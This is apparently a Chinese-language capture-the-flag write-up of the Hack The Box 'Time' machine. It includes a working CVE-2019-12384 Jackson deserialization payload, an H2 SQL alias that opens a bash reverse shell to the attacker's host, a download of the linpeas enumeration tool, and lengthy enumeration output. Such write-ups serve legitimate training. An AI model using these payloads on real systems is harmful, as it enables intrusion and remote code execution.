Time-htb-writeup

0x00 靶场技能介绍

章节技能：fasterxml反序列化、CVE-2019-12384、linpeas.sh工具使用、脚本内容写入

参考链接：https://ik0nw.github.io/2020/11/07/HTB-Time/

参考链接：https://0xdf.gitlab.io/2021/04/03/htb-time.html

0x01 用户权限获取

1、获取下靶机IP地址：10.10.10.214

2、获取下开放端口情况

┌──(kali㉿kali)-[~/桌面/tools/portscan]
└─$ sudo ./htb-portscan.sh 10.10.10.214 tcp
[sudo] kali 的密码：
开始对 10.10.10.214 进行nmap端口扫描...
* 正在执行tcp协议的端口扫描探测...
sudo nmap -min-rate 10000 -p- "10.10.10.214" -oG "10.10.10.214"-tcp-braker-allports

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-13 20:38 CST
Warning: 10.10.10.214 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.214
Host is up (0.45s latency).
Not shown: 61560 closed tcp ports (reset), 3973 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 42.69 seconds
* 正在对开放的端口进行TCP全连接式版本探测和系统版本以及漏洞探测...
sudo nmap -sT -sV -sC -p"22,80," "10.10.10.214"

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-13 20:39 CST
Nmap scan report for 10.10.10.214
Host is up (0.33s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 0f:7d:97:82:5f:04:2b:e0:0a:56:32:5d:14:56:82:d4 (RSA)
|   256 24:ea:53:49:d8:cb:9b:fc:d6:c4:26:ef:dd:34:c1:1e (ECDSA)
|_  256 fe:25:34:e4:3e:df:9f:ed:62:2a:a4:93:52:cc:cd:27 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Online JSON parser
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.97 seconds

3、查看下80端口的服务信息

http://10.10.10.214/

4、通过简单尝试，这个就是一个json解析显示的功能

{"id":1,"name":"shiyan"}

5、这里选择第二个下拉框继续尝试下，发现出现了报错信息

Validation failed: Unhandled Java exception: com.fasterxml.jackson.databind.exc.MismatchedInputException: Unexpected token (START_OBJECT), expected START_ARRAY: need JSON Array to contain As.WRAPPER_ARRAY type information for class java.lang.Object

6、搜索上面的报错信息，知道这事一个反序列化的过程，到这里可以大概的猜出这里可能是让弄一个反序列化的漏洞

DriverManagerConnectionSource 类可用于初始化 Java 数据库连接 （JDBC）。JDBC 是一个 Java API，用于对数据库执行查询。

7、通过关键字检索

fasterxml jackson exploit

8、这里并没有什么大的收获，也耗了好长时间，故参考了演练报告，CVE-2019-12384

9、使用该漏洞的exp进行尝试，发现确实存在漏洞

["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:tcp://10.10.14.8/inject.sql"}]

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.214] 53660
        jdbc:h2:tcp://10.10.14.8:443/����

10、下面参考CSDN上的一个文章，来获取第一个shell的步骤

https://blog.csdn.net/qq_40989258/article/details/105206853

1、在本地创建一个 inject.sql 文件，并写入以下内容


CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
        String[] command = {"bash", "-c", cmd};
        java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
        return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('bash -c "bash -i >& /dev/tcp/10.10.14.8/443 0>&1"')

2、使用Python3 架起一个WEB服务

python3 -m http.server 80

3、首选在WEB页面上输入下列 poc

["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.8/inject.sql'"}]


4、到这里就成功拿到shell了

┌──(kali㉿kali)-[~/桌面]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.214 - - [13/Jan/2024 21:34:25] "GET /inject.sql HTTP/1.1" 200 -


┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.214] 53672
bash: cannot set terminal process group (875): Inappropriate ioctl for device
bash: no job control in this shell
pericles@time:/var/www/html$ id
id
uid=1000(pericles) gid=1000(pericles) groups=1000(pericles)
pericles@time:/var/www/html$ 

11、到这里就拿到了初始的权限，我们获取下flag信息吧

pericles@time:/var/www/html$ ls -la /home
ls -la /home
total 12
drwxr-xr-x  3 root     root     4096 Dec 16  2021 .
drwxr-xr-x 20 root     root     4096 Jan 13 13:35 ..
drwxr-xr-x  7 pericles pericles 4096 Dec 16  2021 pericles
pericles@time:/var/www/html$ cd ~ 
cd ~
pericles@time:/home/pericles$ ls
ls
snap
user.txt
pericles@time:/home/pericles$ cat user.txt
cat user.txt
776257c19cf364e94f0fe1359fda3ede
pericles@time:/home/pericles$ 

0x02 系统权限获取

12、这里直接使用了 linpeas 这个工具进行枚举

pericles@time:/tmp$ wget http://10.10.14.8/linpeas.sh
wget http://10.10.14.8/linpeas.sh
--2024-01-13 13:41:31--  http://10.10.14.8/linpeas.sh
Connecting to 10.10.14.8:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 847920 (828K) [text/x-sh]
Saving to: 'linpeas.sh'

     0K .......... .......... .......... .......... ..........  6% 59.2K 13s
   800K .......... .......... ........                        100% 3.75M=2.6s

2024-01-13 13:41:35 (322 KB/s) - 'linpeas.sh' saved [847920/847920]

pericles@time:/tmp$ ls
ls
hsperfdata_pericles
linpeas.sh
pericles@time:/tmp$


pericles@time:/tmp$ chmod +x linpeas.sh
chmod +x linpeas.sh
pericles@time:/tmp$ ./linpeas.sh
./linpeas.sh


Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist                                                                         
 LEGEND:                                                                                 
  RED/YELLOW: 95% a PE vector
  RED: You should take a look to it
  LightCyan: Users with console
  Blue: Users without console & mounted devs
  Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) 
  LightMagenta: Your username

 Starting linpeas. Caching Writable Folders...

                               ╔═══════════════════╗
═══════════════════════════════╣ Basic information ╠═══════════════════════════════      
                               ╚═══════════════════╝                                     
OS: Linux version 5.4.0-52-generic (buildd@lgw01-amd64-060) (gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04)) #57-Ubuntu SMP Thu Oct 15 10:57:00 UTC 2020
User & Groups: uid=1000(pericles) gid=1000(pericles) groups=1000(pericles)
Hostname: time
Writable folder: /dev/shm
[+] /usr/bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)                                                                             
[+] /usr/bin/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h)           
[+] /usr/bin/nc is available for network discovery & port scanning (linpeas can discover hosts and scan ports, learn more with -h)                                                
                                                                                         
                                                                                         

Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE                                                                    
                                                                                         
                              ╔════════════════════╗
══════════════════════════════╣ System Information ╠══════════════════════════════       
                              ╚════════════════════╝                                     
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits       
Linux version 5.4.0-52-generic (buildd@lgw01-amd64-060) (gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04)) #57-Ubuntu SMP Thu Oct 15 10:57:00 UTC 2020
Distributor ID: Ubuntu
Description:    Ubuntu 20.04 LTS
Release:        20.04
Codename:       focal

╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version          
Sudo version 1.8.31                                                                      


╔══════════╣ PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses  
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin                   

╔══════════╣ Date & uptime
Sat Jan 13 13:42:29 UTC 2024                                                             
 13:42:29 up  1:15,  0 users,  load average: 0.56, 0.16, 0.23

╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)
disk                                                                                     
sda
sda1
sda2
sda3

╔══════════╣ Unmounted file-system?
╚ Check if you can mount umounted devices                                                
/dev/disk/by-uuid/692e1ce5-79a8-43ba-9894-f6778ef46612 / ext4 defaults 0 0               
/dev/sda3       none    swap    sw      0       0

╔══════════╣ Environment
╚ Any private information inside environment variables?                                  
LESSOPEN=| /usr/bin/lesspipe %s                                                          
HISTFILESIZE=0
SHLVL=2
OLDPWD=/home/pericles
APACHE_RUN_DIR=/var/run/apache2
APACHE_PID_FILE=/var/run/apache2/apache2.pid
JOURNAL_STREAM=9:31347
_=./linpeas.sh
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
INVOCATION_ID=f68ac5b076dd4071a0673d3ec6650994
APACHE_LOCK_DIR=/var/lock/apache2
LANG=C
HISTSIZE=0
LS_COLORS=
APACHE_RUN_GROUP=pericles
APACHE_RUN_USER=pericles
LESSCLOSE=/usr/bin/lesspipe %s %s
APACHE_LOG_DIR=/var/log/apache2
PWD=/tmp
HISTFILE=/dev/null

╔══════════╣ Searching Signature verification failed in dmesg
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed                                                                            
dmesg Not Found                                                                          
                                                                                         
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester                                       
[+] [CVE-2022-2586] nft_object UAF                                                       

   Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
   Exposure: probable
   Tags: [ ubuntu=(20.04) ]{kernel:5.12.13}
   Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2021-4034] PwnKit

   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: probable
   Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: mint=19,[ ubuntu=18|20 ], debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit 2

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: probable
   Tags: [ ubuntu=20.04 ]{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded

[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)

   Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
   Exposure: less probable
   Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
   Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2017-5618] setuid screen v4.5.0 LPE

   Details: https://seclists.org/oss-sec/2017/q1/184
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154


╔══════════╣ Executing Linux Exploit Suggester 2
╚ https://github.com/jondonas/linux-exploit-suggester-2                                  
                                                                                         
╔══════════╣ Protections
═╣ AppArmor enabled? .............. You do not have enough privilege to read the profile set.
apparmor module is loaded.
═╣ AppArmor profile? .............. unconfined
═╣ is linuxONE? ................... s390x Not Found
═╣ grsecurity present? ............ grsecurity Not Found                                 
═╣ PaX bins present? .............. PaX Not Found                                        
═╣ Execshield enabled? ............ Execshield Not Found                                 
═╣ SELinux enabled? ............... sestatus Not Found                                   
═╣ Seccomp enabled? ............... disabled                                             
═╣ User namespace? ................ enabled
═╣ Cgroup2 enabled? ............... enabled
═╣ Is ASLR enabled? ............... Yes
═╣ Printer? ....................... No
═╣ Is this a virtual machine? ..... Yes (vmware)                                         

                                   ╔═══════════╗
═══════════════════════════════════╣ Container ╠═══════════════════════════════════      
                                   ╚═══════════╝                                         
╔══════════╣ Container related tools present (if any):
/snap/bin/lxc                                                                            
╔══════════╣ Am I Containered?
╔══════════╣ Container details                                                           
═╣ Is this a container? ........... No                                                   
═╣ Any running containers? ........ No                                                   
                                                                                         

                                     ╔═══════╗
═════════════════════════════════════╣ Cloud ╠═════════════════════════════════════      
                                     ╚═══════╝                                           
═╣ Google Cloud Platform? ............... No
═╣ AWS ECS? ............................. No
═╣ AWS EC2? ............................. No
═╣ AWS EC2 Beanstalk? ................... No
═╣ AWS Lambda? .......................... No
═╣ AWS Codebuild? ....................... No
═╣ DO Droplet? .......................... No
═╣ IBM Cloud VM? ........................ No
═╣ Azure VM? ............................ No
═╣ Azure APP? ........................... No



                ╔════════════════════════════════════════════════╗
════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════       
                ╚════════════════════════════════════════════════╝                       
╔══════════╣ Cleaned processes
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes                                                       
root           1  0.1  0.2 104152 11560 ?        Ss   12:26   0:08 /sbin/init auto automatic-ubiquity noprompt
root         446  0.2  2.0 170504 81044 ?        S<s  12:26   0:11 /lib/systemd/systemd-journald
root         474  0.1  0.1  21460  5548 ?        Ss   12:26   0:06 /lib/systemd/systemd-udevd                                                                                     
systemd+     475  0.0  0.1  18544  7544 ?        Ss   12:26   0:00 /lib/systemd/systemd-networkd
  └─(Caps) 0x0000000000003c00=cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw                                                                                    
root         616  0.0  0.4 345796 18196 ?        SLsl 12:26   0:02 /sbin/multipathd -d -s
systemd+     654  0.0  0.3  23912 12160 ?        Ss   12:26   0:00 /lib/systemd/systemd-resolved
systemd+     656  0.0  0.1  90388  6376 ?        Ssl  12:26   0:01 /lib/systemd/systemd-timesyncd
  └─(Caps) 0x0000000002000000=cap_sys_time
root         679  0.0  0.2  47528 10420 ?        Ss   12:26   0:00 /usr/bin/VGAuthService
root         686  0.1  0.2 162008  8012 ?        S<sl 12:26   0:06 /usr/bin/vmtoolsd
root         764  0.0  0.2 239364  9580 ?        Ssl  12:26   0:00 /usr/lib/accountsservice/accounts-daemon[0m
message+     765  0.0  0.1   7436  4632 ?        Ss   12:26   0:01 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  └─(Caps) 0x0000000020000000=cap_audit_write
root         792  0.0  0.0  81944  3716 ?        Ssl  12:26   0:00 /usr/sbin/irqbalance --foreground
root         798  0.0  0.4  29052 18132 ?        Ss   12:26   0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root         817  0.0  0.0   6812  2940 ?        Ss   12:26   0:00 /usr/sbin/cron -f
syslog       832  0.1  0.1 224324  5848 ?        Ssl  12:26   0:05 /usr/sbin/rsyslogd -n -iNONE
root         834  0.2  0.8 779380 33508 ?        Ssl  12:26   0:13 /usr/lib/snapd/snapd
root         841  0.0  0.1  16632  6160 ?        Ss   12:26   0:00 /lib/systemd/systemd-logind
daemon[0m       854  0.0  0.0   3792  2320 ?        Ss   12:26   0:00 /usr/sbin/atd -f
root         875  0.0  0.4 194032 18872 ?        Ss   12:26   0:00 /usr/sbin/apache2 -k start
pericles     968  0.0  0.3 194888 13092 ?        S    12:26   0:00  _ /usr/sbin/apache2 -k start
pericles     970  0.0  0.3 194896 13648 ?        S    12:26   0:00  _ /usr/sbin/apache2 -k start
pericles     972  0.0  0.3 194880 13692 ?        S    12:26   0:00  _ /usr/sbin/apache2 -k start
pericles   12826  0.0  0.0   2608   612 ?        S    13:34   0:00  |   _ sh -c /usr/bin/jruby /opt/json_project/parse.rb /dev/shm/payload2kCy7H 2>&1
pericles   12827  1.3  5.0 3604996 202560 ?      Sl   13:34   0:06  |       _ java -Xss2048k -Djffi.boot.library.path=/usr/share/jruby/lib/jni -Djava.security.egd=file:/dev/urandom -Xbootclasspath/a:/usr/share/jruby/lib/jruby.jar -classpath : -Djruby.home=/usr/share/jruby -Djruby.lib=/usr/share/jruby/lib -Djruby.script=jruby -Djruby.shell=/bin/sh -Ddebian.include.mri_vendor_libdir_in_load_path=true org.jruby.Main /opt/json_project/parse.rb /dev/shm/payload2kCy7H                                                                    
pericles   12888  0.0  0.0   3976  2992 ?        S    13:34   0:00  |           _ bash -c bash -i >& /dev/tcp/10.10.14.8/443 0>&1
pericles   12890  0.0  0.1   5172  4580 ?        S    13:34   0:00  |               _ bash -i
pericles   14249  0.2  0.0   3420  2568 ?        S    13:42   0:00  |                   _ /bin/sh ./linpeas.sh
pericles   17559  0.0  0.0   3420  1028 ?        S    13:42   0:00  |                       _ /bin/sh ./linpeas.sh
pericles   17562  0.0  0.0   6204  3324 ?        R    13:42   0:00  |                       |   _ ps fauxwww
pericles   17563  0.0  0.0   3420  1028 ?        S    13:42   0:00  |                       _ /bin/sh ./linpeas.sh
pericles    3355  0.0  0.3 194816 13504 ?        S    12:39   0:00  _ /usr/sbin/apache2 -k start
pericles    3380  0.0  0.3 194824 13088 ?        S    12:39   0:00  _ /usr/sbin/apache2 -k start
pericles    3384  0.0  0.3 194912 12912 ?        S    12:39   0:00  _ /usr/sbin/apache2 -k start
pericles    3387  0.0  0.3 194840 13628 ?        S    12:39   0:00  _ /usr/sbin/apache2 -k start
pericles    3595  0.0  0.2 194832 11652 ?        S    12:40   0:00  _ /usr/sbin/apache2 -k start
pericles    3623  0.0  0.2 194824 10532 ?        S    12:40   0:00  _ /usr/sbin/apache2 -k start
pericles    3624  0.0  0.3 194816 13344 ?        S    12:40   0:00  _ /usr/sbin/apache2 -k start
root         919  0.0  0.0   5828  1840 tty1     Ss+  12:26   0:00 /sbin/agetty -o -p -- u --noclear tty1 linux
root         940  0.0  0.2 236416  9216 ?        Ssl  12:26   0:00 /usr/lib/policykit-1/polkitd --no-debug

╔══════════╣ Binary processes permissions (non 'root root' and not belonging to current user)                                                                                     
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes             
                                                                                         
╔══════════╣ Processes whose PPID belongs to a different user (not root)
╚ You will know if a user can somehow spawn processes as a different user                
Proc 475 with ppid 1 is run by user systemd-network but the ppid user is root            
Proc 654 with ppid 1 is run by user systemd-resolve but the ppid user is root
Proc 656 with ppid 1 is run by user systemd-timesync but the ppid user is root
Proc 765 with ppid 1 is run by user messagebus but the ppid user is root
Proc 832 with ppid 1 is run by user syslog but the ppid user is root
Proc 854 with ppid 1 is run by user daemon but the ppid user is root
Proc 968 with ppid 875 is run by user pericles but the ppid user is root
Proc 970 with ppid 875 is run by user pericles but the ppid user is root
Proc 972 with ppid 875 is run by user pericles but the ppid user is root
Proc 3355 with ppid 875 is run by user pericles but the ppid user is root
Proc 3380 with ppid 875 is run by user pericles but the ppid user is root
Proc 3384 with ppid 875 is run by user pericles but the ppid user is root
Proc 3387 with ppid 875 is run by user pericles but the ppid user is root
Proc 3595 with ppid 875 is run by user pericles but the ppid user is root
Proc 3623 with ppid 875 is run by user pericles but the ppid user is root
Proc 3624 with ppid 875 is run by user pericles but the ppid user is root

╔══════════╣ Files opened by processes belonging to other users
╚ This is usually empty because of the lack of privileges to read other user processes information                                                                                
COMMAND     PID   TID TASKCMD               USER   FD      TYPE             DEVICE  SIZE/OFF   NODE NAME

╔══════════╣ Processes with credentials in memory (root req)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory                                                                                
gdm-password Not Found                                                                   
gnome-keyring-daemon Not Found                                                           
lightdm Not Found                                                                        
vsftpd Not Found                                                                         
apache2 process found (dump creds from memory as root)                                   
sshd: process found (dump creds from memory as root)

╔══════════╣ Cron jobs
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs   
/usr/bin/crontab                                                                         
incrontab Not Found
-rw-r--r-- 1 root root    1042 Feb 13  2020 /etc/crontab                                 

/etc/cron.d:
total 24
drwxr-xr-x   2 root root 4096 Dec 16  2021 .
drwxr-xr-x 102 root root 4096 Dec 16  2021 ..
-rw-r--r--   1 root root  102 Feb 13  2020 .placeholder
-rw-r--r--   1 root root  201 Feb 14  2020 e2scrub_all
-rw-r--r--   1 root root  712 Mar 27  2020 php
-rw-r--r--   1 root root  191 Apr 23  2020 popularity-contest

/etc/cron.daily:
total 52
drwxr-xr-x   2 root root 4096 Dec 16  2021 .
drwxr-xr-x 102 root root 4096 Dec 16  2021 ..
-rw-r--r--   1 root root  102 Feb 13  2020 .placeholder
-rwxr-xr-x   1 root root  539 Apr 13  2020 apache2
-rwxr-xr-x   1 root root  376 Dec  4  2019 apport
-rwxr-xr-x   1 root root 1478 Apr  9  2020 apt-compat
-rwxr-xr-x   1 root root  355 Dec 29  2017 bsdmainutils
-rwxr-xr-x   1 root root 1187 Sep  5  2019 dpkg
-rwxr-xr-x   1 root root  377 Jan 21  2019 logrotate
-rwxr-xr-x   1 root root 1123 Feb 25  2020 man-db
-rwxr-xr-x   1 root root 4574 Jul 18  2019 popularity-contest
-rwxr-xr-x   1 root root  214 Apr  2  2020 update-notifier-common

/etc/cron.hourly:
total 12
drwxr-xr-x   2 root root 4096 Dec 16  2021 .
drwxr-xr-x 102 root root 4096 Dec 16  2021 ..
-rw-r--r--   1 root root  102 Feb 13  2020 .placeholder

/etc/cron.monthly:
total 12
drwxr-xr-x   2 root root 4096 Dec 16  2021 .
drwxr-xr-x 102 root root 4096 Dec 16  2021 ..
-rw-r--r--   1 root root  102 Feb 13  2020 .placeholder

/etc/cron.weekly:
total 20
drwxr-xr-x   2 root root 4096 Dec 16  2021 .
drwxr-xr-x 102 root root 4096 Dec 16  2021 ..
-rw-r--r--   1 root root  102 Feb 13  2020 .placeholder
-rwxr-xr-x   1 root root  813 Feb 25  2020 man-db
-rwxr-xr-x   1 root root  211 Apr  2  2020 update-notifier-common

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

╔══════════╣ Systemd PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-relative-paths                                                                                    
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin              

╔══════════╣ Analyzing .service files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services              
/etc/systemd/system/multi-user.target.wants/atd.service could be executing some relative path
/etc/systemd/system/web_backup.service could be executing some relative path
You can't write on systemd PATH

╔══════════╣ System timers
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers                
NEXT                        LEFT           LAST                        PASSED                UNIT                         ACTIVATES                     
Sat 2024-01-13 13:42:41 UTC 2s left        Sat 2024-01-13 13:42:31 UTC 8s ago                timer_backup.timer           timer_backup.service          
Sat 2024-01-13 13:47:40 UTC 5min left      Tue 2021-02-09 14:42:14 UTC 2 years 11 months ago motd-news.timer              motd-news.service             
Sat 2024-01-13 14:09:00 UTC 26min left     Sat 2024-01-13 13:39:01 UTC 3min 38s ago          phpsessionclean.timer        phpsessionclean.service       
Sat 2024-01-13 15:45:40 UTC 2h 3min left   Thu 2020-10-22 20:24:53 UTC 3 years 2 months ago  fwupd-refresh.timer          fwupd-refresh.service         
Sun 2024-01-14 00:00:00 UTC 10h left       Sat 2024-01-13 12:26:38 UTC 1h 16min ago          logrotate.timer              logrotate.service             
Sun 2024-01-14 00:00:00 UTC 10h left       Sat 2024-01-13 12:26:38 UTC 1h 16min ago          man-db.timer                 man-db.service                
Sun 2024-01-14 00:14:19 UTC 10h left       Thu 2020-10-22 18:44:20 UTC 3 years 2 months ago  apt-daily.timer              apt-daily.service             
Sun 2024-01-14 03:10:58 UTC 13h left       Sat 2024-01-13 12:26:43 UTC 1h 15min ago          e2scrub_all.timer            e2scrub_all.service           
Sun 2024-01-14 06:51:53 UTC 17h left       Sat 2024-01-13 13:00:42 UTC 41min ago             apt-daily-upgrade.timer      apt-daily-upgrade.service     
Sun 2024-01-14 12:41:31 UTC 22h left       Sat 2024-01-13 12:41:31 UTC 1h 1min ago           systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Mon 2024-01-15 00:00:00 UTC 1 day 10h left Sat 2024-01-13 12:26:38 UTC 1h 16min ago          fstrim.timer                 fstrim.service                
n/a                         n/a            n/a                         n/a                   snapd.snap-repair.timer      snapd.snap-repair.service     

╔══════════╣ Analyzing .timer files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers                
                                                                                         
╔══════════╣ Analyzing .socket files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets               
/etc/systemd/system/sockets.target.wants/uuidd.socket is calling this writable listener: /run/uuidd/request                                                                       
/snap/core18/1705/lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket                                                               
/snap/core18/1705/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket                                          
/snap/core18/1705/lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/snap/core18/1705/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/snap/core18/1705/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/snap/core18/1705/lib/systemd/system/syslog.socket is calling this writable listener: /run/systemd/journal/syslog                                                                 
/snap/core18/1705/lib/systemd/system/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log                                              
/snap/core18/1705/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout                                                       
/snap/core18/1705/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket                                                       
/snap/core18/1885/lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket                                                               
/snap/core18/1885/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket                                          
/snap/core18/1885/lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/snap/core18/1885/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/snap/core18/1885/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/snap/core18/1885/lib/systemd/system/syslog.socket is calling this writable listener: /run/systemd/journal/syslog                                                                 
/snap/core18/1885/lib/systemd/system/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log                                              
/snap/core18/1885/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout                                                       
/snap/core18/1885/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket                                                       
/usr/lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket                                                                            

╔══════════╣ Unix Sockets Listening
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets               
sed: -e expression #1, char 0: no previous regular expression                            
/org/kernel/linux/storage/multipathd
/run/dbus/system_bus_socket
  └─(Read Write)
/run/irqbalance//irqbalance792.sock
  └─(Read )
/run/irqbalance/irqbalance792.sock
  └─(Read )
/run/lvm/lvmpolld.socket
/run/snapd-snap.socket
  └─(Read Write)
/run/snapd.socket
  └─(Read Write)
/run/systemd/journal/dev-log
  └─(Read Write)
/run/systemd/journal/io.systemd.journal
/run/systemd/journal/socket
  └─(Read Write)
/run/systemd/journal/stdout
  └─(Read Write)
/run/systemd/journal/syslog
  └─(Read Write)
/run/systemd/notify
  └─(Read Write)
/run/systemd/private
  └─(Read Write)
/run/systemd/userdb/io.systemd.DynamicUser
  └─(Read Write)
/run/udev/control
/run/uuidd/request
  └─(Read Write)
/run/vmware/guestServicePipe
  └─(Read Write)
/var/run/vmware/guestServicePipe
  └─(Read Write)
/var/snap/lxd/common/lxd/unix.socket

╔══════════╣ D-Bus config files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus                 
